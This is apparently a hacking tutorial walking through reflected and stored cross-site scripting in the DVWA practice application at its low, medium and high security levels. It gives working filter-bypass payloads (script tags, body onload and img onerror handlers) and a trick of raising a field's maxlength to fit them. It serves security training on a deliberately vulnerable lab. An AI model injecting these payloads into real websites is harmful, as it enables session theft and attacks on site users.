XSS Exploitation in DVWA (Bypass All Security)
In previous tutorial I have discussed cross site scripting attack and looked over the damage cause by it. Where I briefly explained the type of XSS vulnerability; now in this tutorial you will learn how to bypass both type of XSS vulnerability (store and reflected) in all three security levels if the web application is suffering from it.
Reflected Cross Site Scripting
Set security low
Explore localhost IP in browser; now login with admin: password and select the reflected cross site scripting vulnerability from given list of vulnerabilities.
Now have a look over a small script which would generate an alert window. So in the given text field for “name” I will inject the script in the server.
<script>alert(“helllooo”)</script>
Browser will execute our script which generates an alert prompt as showing following screenshot.
In low security it will easily bypass the injected script when an attacker injects it in the text field given for “name” which should be not left empty according developer.
Set Security Medium
In medium security if you visit to view source of its web page then you will find that the highlighted content has added an extra layer of security to the inserted input in text field given for “name” which will check for script tag to disable the java script.
str_replace — Replace all occurrences of the search string with the replacement string And if an attacker tries to inject a script using script tag, the string inside script will get replaced to blank space.
It could be considered as case sensitive because the given PHP script will check for <script> which can be replaced by <SCRIPT> or using other HTML tag to bypass medium security.
There are two ways either use <SCRIPT> tag or any other HTML element, write now I had used body tag to inject the string.
<body onload=alert(“XSS”)>
Above script is successfully injected and we have bypassed the medium security. You can see from given screenshot XSS prompt get opened using body tag.
Set Security High
In high security the level of security increased where you can easily find preg-replace PHP function is used to perform regular expression to disable the java script.
Preg_replace – Searches string for matches to pattern and replaces them with replacement.
Now above technique will fail as you can see it will search for each and every valid input character for text field and replace invalid character into blank space.
To bypass high security level use element of HTML, as you can see I have use image source tag to generate the string inside the web server.
<img src=x onError=alert(‘xss’)>
From given below screenshot you see XSS alert prompt.
CONGRATS!!! We have successfully bypassed all three level of security.
Stored Cross Site Scripting
Set security low
Now have a look over a small script which would generate an alert window. So in the text area given for message I will inject the script which get store in the server.
<script>alert(“helllooo”)</script>
Now when user will visit this page to read our message his browser will execute our script which generates an alert prompt as showing following screenshot.
Since it get permanently stored in web application server therefore before switching to other two level of security you need to reset the data base.
Set Security Medium
If you remember, in previous article we have used inspect element to change text area given for message length so that we might able to inject our script inside it. Repeat the same process to change the maximum length given text field of “name”.
Change “maxlength=10 into maxlength=100”; which will be sufficient area for injecting the content of script.
Now type following content inside the text field given for “name”.
<body onload=alert(“XSS”)>
Remember do not leave message box empty.
Now when user will visit this page to read our message his browser will execute our script which generates an alert prompt as showing following screenshot.
Again you need to reset the data base.
Set security High
Repeat the same process to change the max length of text field given for “name”.
Change “maxlength=10 into maxlength=100”
Now type following content inside the text field given for “name”.
<img src=x onError=alert(‘xss’)>
Remember do not leave message box empty.
CONGRATS!!! We have successfully bypassed all three level of security.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Source: www.hackingarticles.in